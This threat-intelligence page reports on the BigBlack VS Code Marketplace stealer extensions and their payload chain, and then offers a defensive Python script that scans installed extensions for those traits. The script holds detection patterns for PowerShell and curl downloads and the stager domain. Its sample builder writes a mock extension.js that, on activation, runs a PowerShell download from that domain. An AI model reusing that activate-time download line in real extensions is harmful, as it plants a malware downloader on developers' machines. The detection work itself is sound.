
BigBlack VS Code Marketplace stealer extensions

Malware Activity
Happening score: 22
1 unique source, 1 article

Summary


The discovery of malicious VS Code Marketplace extensions matters because a single install can quietly turn a developer workstation into a stealer platform and exfiltrate sensitive data within seconds of the editor starting. Two packages, BigBlack.bitcoin-black and BigBlack.codo-ai, posed as a premium dark theme and an AI coding assistant respectively while hiding stealer malware behind otherwise working functionality. A third package from the same publisher, BigBlack.mrbigblacktheme, was also removed for containing malware.

Related Happenings

MuddyWater broad cyber-espionage campaign across sectors and countries

Campaign
First: 14.05.2026 00:59 Last: 14.05.2026 00:59 Sources 1

About this happening: **MuddyWater** was tied to a **2026 espionage campaign** affecting **at least nine organizations** across **nine countries** on **four continents**, with victims in **industrial a...

GlassWorm OpenVSX sleeper extension campaign

Campaign
First: 28.04.2026 00:41 Last: 28.04.2026 00:41 Sources 1

About this happening: The **GlassWorm** operation has launched a **new wave** against **OpenVSX**, seeding **73 sleeper extensions** that become malicious after an **update** and can deliver malware to...

GlassWorm v2 cloned VS Code extension loaders

Malware Activity
First: 27.04.2026 14:23 Last: 27.04.2026 14:23 Sources 1

About this happening: The **GlassWorm v2** malware activity now uses **cloned VS Code extensions** on **Open VSX** to deliver payloads that steal credentials, deploy a **RAT**, and spread across multip...

GlassWorm Zig dropper infecting developer IDEs

Malware Activity
First: 10.04.2026 16:23 Last: 10.04.2026 16:23 Sources 1

About this happening: The **GlassWorm** malware set now uses a **Zig dropper** that can silently infect **all VS Code-based IDEs** on a developer's machine, widening the reach of the compromise. The pa...

GlassWorm supply-chain malware wave across GitHub, npm, and VSCode/OpenVSX

Malware Activity
First: 17.03.2026 23:42 Last: 17.03.2026 23:42 Sources 1

About this happening: **GlassWorm** returned in a **new coordinated supply-chain attack** that compromised **433 components** across **GitHub, npm, and VSCode/OpenVSX**, creating a broad software-distr...

Latest development: 28.04.2026 00:41

GlassWorm returned in an OpenVSX supply-chain wave with 73 cloned sleeper extensions that were benign at upload and later turned malicious after an update, with six already activated to deliver malware. The extensions act as thin loaders that fetch payloads through GitHub-hosted secondary VSIX packages, platform-specific .node modules, or heavily obfuscated JavaScript, shifting the campaign toward submitting innocuous extensions first and introducing the malicious payload later.

Timeline

  1. 09.12.2025 10:07 1 article · 5mo ago

    Microsoft removes BigBlack.bitcoin-black from VS Code Marketplace

    Mitigation Patch Update

    Microsoft removed BigBlack.bitcoin-black from the Microsoft Visual Studio Code (VS Code) Marketplace on December 5, 2025 after the extension was identified as a malicious package: it masqueraded as a premium dark theme (which has no legitimate reason to run code at all) but was configured to activate on every VS Code action, so its hidden loader ran as soon as the editor was used and infected developer machines with stealer malware.

  2. 09.12.2025 10:07 1 article · 5mo ago

    Microsoft removes BigBlack.codo-ai from VS Code Marketplace

    Mitigation Patch Update

    Microsoft removed BigBlack.codo-ai from the Microsoft Visual Studio Code (VS Code) Marketplace on December 8, 2025 after the extension was identified as a malicious AI coding assistant: the assistant features worked as advertised, which is what kept users from noticing the stealer malware hidden inside the same package and used to infect developer machines.

  3. 09.12.2025 10:07 2 articles · 5mo ago

    Researchers disclose malicious VS Code Marketplace extensions and payload chain

    Initial Disclosure

    Cybersecurity researchers disclosed that the Microsoft Visual Studio Code (VS Code) Marketplace extensions BigBlack.bitcoin-black and BigBlack.codo-ai were built to infect developer machines with stealer malware; Microsoft also removed BigBlack.mrbigblacktheme, from the same publisher, for containing malware. The payload chain changed across versions: the extensions first used PowerShell to download a password-protected ZIP from syn1112223334445556667778889990[.]org, later switched to a batch script that fetched it with curl, and then relied on the legitimate Lightshot binary loading a planted Lightshot.dll (DLL hijacking) so that the stealer ran under a trusted process name. The stealer collected clipboard contents, installed applications, running processes, desktop screenshots, stored Wi-Fi credentials, detailed system information, Google Chrome cookies, and Microsoft Edge session data.

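The traits the timeline describes (a theme that ships executable code, an activation event that fires on everything, a PowerShell or curl download stage, the defanged stager domain, and a Lightshot side-load) are all visible on disk in the extension folder, which makes them cheap to triage without running anything. The script below is an added example written for this page, not code from the researchers or from the extensions themselves: it walks an extensions root such as ~/.vscode/extensions, parses each package.json, and reports which of those traits each extension exhibits. The sample extensions it builds are constructed for the demonstration; the suspicious one only mimics the behaviour described above and is not the real extension code.

```python
"""Triage installed VS Code extensions for the traits described in the BigBlack report."""
import json
import re
import tempfile
from pathlib import Path

# Extension IDs named on the page (publisher.name, compared case-insensitively).
KNOWN_BAD_IDS = {
    "bigblack.bitcoin-black",
    "bigblack.codo-ai",
    "bigblack.mrbigblacktheme",
}

# Strings tied to the payload chain. The stager domain is matched in both
# its defanged form (as published) and its plain form (as it would appear in code).
SUSPECT_PATTERNS = [
    ("powershell-download", re.compile(r"powershell|pwsh|Invoke-WebRequest|DownloadFile", re.I)),
    ("curl-download", re.compile(r"\bcurl\b", re.I)),
    ("stager-domain", re.compile(r"syn1112223334445556667778889990(\[\.\]|\.)org", re.I)),
    ("lightshot-sideload", re.compile(r"Lightshot(\.exe|\.dll)", re.I)),
]

SCANNED_SUFFIXES = {".js", ".cjs", ".mjs", ".bat", ".cmd", ".ps1"}


def scan_extension(ext_dir: Path) -> dict:
    """Return {'id': ..., 'findings': [...]} for one extension directory."""
    manifest = json.loads((ext_dir / "package.json").read_text(encoding="utf-8"))
    ext_id = f"{manifest.get('publisher', '')}.{manifest.get('name', '')}".lower()
    findings = []
    if ext_id in KNOWN_BAD_IDS:
        findings.append("known-bad-id")
    # "*" means the extension's JS runs on any VS Code activity, not on a
    # specific command or language; that is what gives a stealer a foothold.
    if "*" in manifest.get("activationEvents", []):
        findings.append("activates-on-everything")
    # A pure colour theme is JSON only; a theme with a "main" entry point
    # ships code that the theme itself never needs.
    if manifest.get("contributes", {}).get("themes") and manifest.get("main"):
        findings.append("theme-with-code")
    # Grep every script-like file shipped in the extension for the chain's markers.
    for path in ext_dir.rglob("*"):
        if path.is_file() and path.suffix.lower() in SCANNED_SUFFIXES:
            text = path.read_text(encoding="utf-8", errors="ignore")
            for label, pattern in SUSPECT_PATTERNS:
                if label not in findings and pattern.search(text):
                    findings.append(label)
    return {"id": ext_id, "findings": findings}


def scan_extensions_root(root: Path) -> list:
    """Scan every extension folder under root (e.g. Path.home() / '.vscode' / 'extensions')."""
    return [scan_extension(d) for d in sorted(root.iterdir()) if (d / "package.json").is_file()]


def build_sample_root() -> Path:
    """Constructed sample data so the scan runs offline: one benign theme and one
    'theme' modelled on the report's description (hypothetical contents, not the real extension)."""
    root = Path(tempfile.mkdtemp())
    good = root / "someone.nice-theme-1.0.0"
    good.mkdir()
    (good / "package.json").write_text(json.dumps({
        "publisher": "someone", "name": "nice-theme",
        "contributes": {"themes": [{"label": "Nice", "path": "./themes/nice.json"}]},
    }), encoding="utf-8")
    bad = root / "bigblack.bitcoin-black-1.0.0"
    bad.mkdir()
    (bad / "package.json").write_text(json.dumps({
        "publisher": "BigBlack", "name": "bitcoin-black",
        "main": "./extension.js", "activationEvents": ["*"],
        "contributes": {"themes": [{"label": "Bitcoin Black", "path": "./themes/dark.json"}]},
    }), encoding="utf-8")
    (bad / "extension.js").write_text(
        'const { exec } = require("child_process");\n'
        'exports.activate = () => exec("powershell -c Invoke-WebRequest '
        'http://syn1112223334445556667778889990.org/p.zip");\n',
        encoding="utf-8",
    )
    return root


if __name__ == "__main__":
    for result in scan_extensions_root(build_sample_root()):
        print(result["id"], "->", result["findings"] or "clean")
```

Run it against the real extensions directory by replacing build_sample_root() with the path to ~/.vscode/extensions. The scan only covers what the extension ships; the Lightshot binary and DLL are dropped later by the downloaded stage, so a machine that already ran the loader also needs a host-level check for a Lightshot process started from an unexpected directory and for outbound connections to the stager domain.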